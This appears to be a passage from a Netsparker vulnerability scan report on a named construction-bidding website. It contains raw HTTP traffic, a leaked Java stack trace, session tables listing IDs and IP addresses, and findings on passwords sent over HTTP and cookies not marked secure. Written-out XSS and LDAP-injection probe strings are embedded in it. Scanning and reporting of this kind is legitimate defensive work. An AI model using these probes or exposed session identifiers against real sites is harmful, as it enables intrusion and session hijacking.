nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; Yahoo Pipes 2.0; +http://developer.yahoo.com/yql/provider) Gecko/20090729 Firefox/3.5.2</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1000887201444992428">/1000887201444992428</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.169</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 23 11:30 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Yahoo Pipes 1.0</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001009767694586911">/1001009767694586911</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.168</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 12:17 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; Yahoo Pipes 2.0; +http://developer.yahoo.com/yql/provider) Gecko/20090729 Firefox/3.5.2</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001053229268131260">/1001053229268131260</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.168</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 27 02:52 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Yahoo Pipes 1.0</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001271621786391028">/1001271621786391028</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">65.116.50.98</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 28 09:11 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SearchToolbar 1.2; GTB6.6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; BRI/1; MSN Optimized;US)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001328704857911433">/1001328704857911433</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">207.171.99.1</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 28 11:25 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; MS-RTC LM 8)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001751426128761577">/1001751426128761577</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">208.115.111.246</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 26 12:23 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001915922055110227">/1001915922055110227</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.168</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 05:23 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Yahoo Pipes 1.0</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1002073102683406456">/1002073102683406456</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">67.195.111.172</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 05:57 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1002350286901349887">/1002350286901349887</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.168</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 27 11:45 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Yahoo Pipes 1.0</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/100249238073776755">/100249238073776755</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">64.90.68.3</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 28 03:17 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1002744978960003472">/1002744978960003472</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.169</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 24 03:38 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</fon..
Date: Tue, 01 Mar 2011 20:03:12 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:12 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 15218220
Content-Type: text/html;charset=utf-8
<html><head><title>Exception in IPPShowProjData.handleEnvironment()</title><script language="JavaScript"><!--//function prepare() { document.form1.title.value = document.title; document.form1.location.value = document.location; document.form1.referrer.value = document.referrer; document.form1.platform.value = navigator.appName + " " + navigator.appVersion; document.form1.message.value = document.all.details.innerText; document.form1.comments.select();}//--></script></head><body onload="prepare()"><font face="verdana,arial,helvetica,sans-serif"><hr><div align="center"><font face="verdana" size="+2"><b>Exception in IPPShowProjData.handleEnvironment()</b></font></div><hr><script language="JavaScript"><!--//document.write('Location: <font color="#FF0000">' + document.location + '</font><br>');document.write('Referrer: <font color="#FF0000">' + document.referrer + '</font><br>');document.write('Platform: <font color="#FF0000">' + navigator.appName + ' ' + navigator.appVersion + '</font><br>');//--></script></font><form name="form1" method="post" action="mailto:support@open-techsys.com?SUBJECT=Exception in IPPShowProjData.handleEnvironment()" enctype="text/plain"> <input class="button" type="button" value="Back" onclick="history.back(); return true"> <input class="button" type="button" value="Details" onclick="if (this.value == 'Details') { document.all.details.style.display=''; this.value='Hide' } else { document.all.details.style.display='none'; this.value='Details' } return true"> <div id="details" style="display:none"> <br> <font color="#FF0000">2011/03/01 14:03:12.969 [ 1] (TP-Processor1804) Exception in IPPShowProjData.handleEnvironment() from 173.193.214.243 using Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) while processing URL http://qap.questcdn.com/qap/action/IPPshowProjData?'"--></style></script><script>netsparker(0x0001A4)</script><pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/lang/NullPointerException.html" target="new">java.lang.NullPointerException</a>: null at com.questcdn.projects.IPPShowProjData.handleEnvironment(IPPShowProjData.java:111) at dynamic.intraframe.handlers.BaseHandler.handle(BaseHandler.java:29) at dynamic.intraframe.handlers.Dispatcher.dispatchAction(Dispatcher.java:143) at dynamic.intraframe.engine.BaseInvocationContext.dispatchAction(BaseInvocationContext.java:1194) at dynamic.intraframe.engine.BaseApplicationContext.handleAction(BaseApplicationContext.java:934) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:843) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font><br> <br> <table width="600" border="0" cellpadding="0" cellspacing="1"> <tr><td bgcolor="#8888CC"><h3>URL</td></tr> <tr><td>http://qap.questcdn.com/qap/action/IPPshowProjData</td></tr> <tr><td> </td></tr> <tr><td bgcolor="#8888CC"><h3>Transient Data</td></tr> <tr><td><table width="100%"><tr><td bgcolor="#888888"><font size="2"><b>Key</b></font></td><td bgcolor="#888888"><font size="2"><b>Type</b></font></td><td bgcolor="#888888"><font size="2"><b>Value</b></font></td></tr></table></td></tr> <tr><td> </td></tr> <tr><td bgcolor="#8888CC"><h3>Parameter Data</td></tr> <tr><td><table width="100%"><tr><td bgcolor="#888888"><font size="2"><b>Key</b></font></td><td bgcolor="#888888"><font size="2"><b>Type</b></font></td><td bgcolor="#888888"><font size="2"><b>Value</b></font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1">'"--></style></script><script>netsparker(0x0001A4)</script></font></td><td bgcolor="#DCDCDC"><font size="1">java.lang.String</font></td><td bgcolor="#DCDCDC"><font size="1"></font></td></tr></table></td></tr> <tr><td> </td></tr> <tr><td bgcolor="#8888CC"><h3>Session Data</td></tr> <tr><td><b>SessionManager:</b> dynamic.intraframe.session.BaseSessionManager<br><b>Active Session Count:</b> 27260<br><b>Current Session ID:</b> <a href="?function=sessions&session=/177428174825690686">/177428174825690686</a><br><table width="100%"><tr><td bgcolor="#8888CC"><font size="2"><b>ID</b></font></td><td bgcolor="#8888CC"><font size="2"><b>IP Address</b></font></td><td bgcolor="#8888CC"><font size="2"><b>Created</b></font></td><td bgcolor="#8888CC"><font size="2"><b>Accessed</b></font></td><td bgcolor="#8888CC"><font size="2"><b>Expires</b></font></td><td bgcolor="#8888CC"><font size="2"><b>User Agent</b></font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=*)!(sn=*">*)!(sn=*</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">173.193.214.243</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:01 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=*)(sn=*">*)(sn=*</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">173.193.214.243</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:01 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/100032182287396464">/100032182287396464</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">87.248.122.142</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 10:47 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; Yahoo Pipes 2.0; +http://developer.yahoo.com/yql/provider) Gecko/20090729 Firefox/3.5.2</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1000887201444992428">/1000887201444992428</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.169</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 23 11:30 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Yahoo Pipes 1.0</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001009767694586911">/1001009767694586911</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.168</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 12:17 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; Yahoo Pipes 2.0; +http://developer.yahoo.com/yql/provider) Gecko/20090729 Firefox/3.5.2</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001053229268131260">/1001053229268131260</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.168</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 27 02:52 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Yahoo Pipes 1.0</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001271621786391028">/1001271621786391028</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">65.116.50.98</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 28 09:11 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SearchToolbar 1.2; GTB6.6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; BRI/1; MSN Optimized;US)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001328704857911433">/1001328704857911433</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">207.171.99.1</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 28 11:25 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; MS-RTC LM 8)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001751426128761577">/1001751426128761577</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">208.115.111.246</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 26 12:23 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001915922055110227">/1001915922055110227</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.168</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 05:23 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Yahoo Pipes 1.0</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1002073102683406456">/1002073102683406456</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">67.195.111.172</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 05:57 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1002350286901349887">/1002350286901349887</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.168</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 27 11:45 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Yahoo Pipes 1.0</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/100249238073776755">/100249238073776755</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">64.90.68.3</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 28 03:17 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1002744978960003472">/1002744978960003472</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.169</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 24 03:38 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:03 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:03 PM</fon..
Password Transmitted Over HTTP
Password Transmitted Over HTTP
1
TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.
Impact
If an attacker can intercept network traffic he/she can steal users credentials.
Actions to Take
- See the remedy for solution.
- Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
|
- /qap/
/qap/ CONFIRMED |
Form target action
/qap/action/l2Login
Request
GET /qap/ HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/2363182003619323783; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3464
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>QUESTCDN: Providers List</title> <script type="text/javascript" language="javascript"> function tzTest() { return; var rightNow = new Date(); var jan1 = new Date(rightNow.getFullYear(), 0, 1, 0, 0, 0, 0); var temp = jan1.toUTCString(); var jan2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var std_time_offset = (jan1 - jan2) / (1000 * 60 * 60); var june1 = new Date(rightNow.getFullYear(), 6, 1, 0, 0, 0, 0); temp = june1.toUTCString(); var june2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var daylight_time_offset = (june1 - june2) / (1000 * 60 * 60); var dst; if (std_time_offset == daylight_time_offset) dst = "0"; // daylight savings time is NOT observed else dst = "1"; // daylight savings time is observed var msg = ""; msg += "rightNow: " + rightNow + "\r\n"; msg += "std_time_offset: " + std_time_offset + "\r\n"; msg += "jan1: " + jan1 + "\r\n"; msg += "jan2: " + jan2 + "\r\n"; msg += "jan GMT: " + jan1.toGMTString() + "\r\n"; msg += "jan UTC: " + jan1.toUTCString() + "\r\n"; msg += "\r\n"; msg += "daylight_time_offset: " + daylight_time_offset + "\r\n"; msg += "jun1: " + june1 + "\r\n"; msg += "jun2: " + june2 + "\r\n"; msg += "jun GMT: " + june1.toGMTString() + "\r\n"; msg += "jun UTC: " + june1.toUTCString() + "\r\n"; msg += "dst: " + dst + "\r\n"; msg += "jan tzOffset: " + jan1.getTimezoneOffset() + "\r\n"; msg += "jun tzOffset: " + june1.getTimezoneOffset() + "\r\n"; msg += "Now tzOffset: " + rightNow.getTimezoneOffset() + "\r\n"; alert(msg); } </script> </head> <body> <form name="userdata" action="/qap/action/l2Login" method="POST"> <input type="hidden" name="loginPagePath" value="index.html"/> <table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"> <tr> <td style="width:100%;height:100%" valign="top"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table> <tr> <td style="width:100">username:</td> <td><input type="text" name="username" size="24"/></td> </tr> <tr> <td>password:</td> <td><input type="password" name="password" size="24"/></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"/></td> </tr> </table> </td> </tr> </table> </form> <script type="text/javascript"> tzTest(); </script> </body></html>
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/2363182003619323783; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3464
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>QUESTCDN: Providers List</title> <script type="text/javascript" language="javascript"> function tzTest() { return; var rightNow = new Date(); var jan1 = new Date(rightNow.getFullYear(), 0, 1, 0, 0, 0, 0); var temp = jan1.toUTCString(); var jan2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var std_time_offset = (jan1 - jan2) / (1000 * 60 * 60); var june1 = new Date(rightNow.getFullYear(), 6, 1, 0, 0, 0, 0); temp = june1.toUTCString(); var june2 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1)); var daylight_time_offset = (june1 - june2) / (1000 * 60 * 60); var dst; if (std_time_offset == daylight_time_offset) dst = "0"; // daylight savings time is NOT observed else dst = "1"; // daylight savings time is observed var msg = ""; msg += "rightNow: " + rightNow + "\r\n"; msg += "std_time_offset: " + std_time_offset + "\r\n"; msg += "jan1: " + jan1 + "\r\n"; msg += "jan2: " + jan2 + "\r\n"; msg += "jan GMT: " + jan1.toGMTString() + "\r\n"; msg += "jan UTC: " + jan1.toUTCString() + "\r\n"; msg += "\r\n"; msg += "daylight_time_offset: " + daylight_time_offset + "\r\n"; msg += "jun1: " + june1 + "\r\n"; msg += "jun2: " + june2 + "\r\n"; msg += "jun GMT: " + june1.toGMTString() + "\r\n"; msg += "jun UTC: " + june1.toUTCString() + "\r\n"; msg += "dst: " + dst + "\r\n"; msg += "jan tzOffset: " + jan1.getTimezoneOffset() + "\r\n"; msg += "jun tzOffset: " + june1.getTimezoneOffset() + "\r\n"; msg += "Now tzOffset: " + rightNow.getTimezoneOffset() + "\r\n"; alert(msg); } </script> </head> <body> <form name="userdata" action="/qap/action/l2Login" method="POST"> <input type="hidden" name="loginPagePath" value="index.html"/> <table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"> <tr> <td style="width:100%;height:100%" valign="top"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table> <tr> <td style="width:100">username:</td> <td><input type="text" name="username" size="24"/></td> </tr> <tr> <td>password:</td> <td><input type="password" name="password" size="24"/></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"/></td> </tr> </table> </td> </tr> </table> </form> <script type="text/javascript"> tzTest(); </script> </body></html>
Cookie Not Marked As Secure
Cookie Not Marked As Secure
1
TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.
Impact
This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.
Actions to Take
- See the remedy for solution.
- Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))
Remedy
Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
|
- /qap/
/qap/ CONFIRMED |
Identified Cookie
sessionIdentifier
Request
GET /qap/ HTTP/1.1
Referer: https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true%20download_type=plan%20jobCategoryNo=%3C?p:jobCategoryNo?%3E%20jobNo=%3C?p:jobNo?%3E%20member_no=%3C?s:subscriberPK?%3E%20provider=%3C?p:provider?%3E
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true%20download_type=plan%20jobCategoryNo=%3C?p:jobCategoryNo?%3E%20jobNo=%3C?p:jobNo?%3E%20member_no=%3C?s:subscriberPK?%3E%20provider=%3C?p:provider?%3E
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
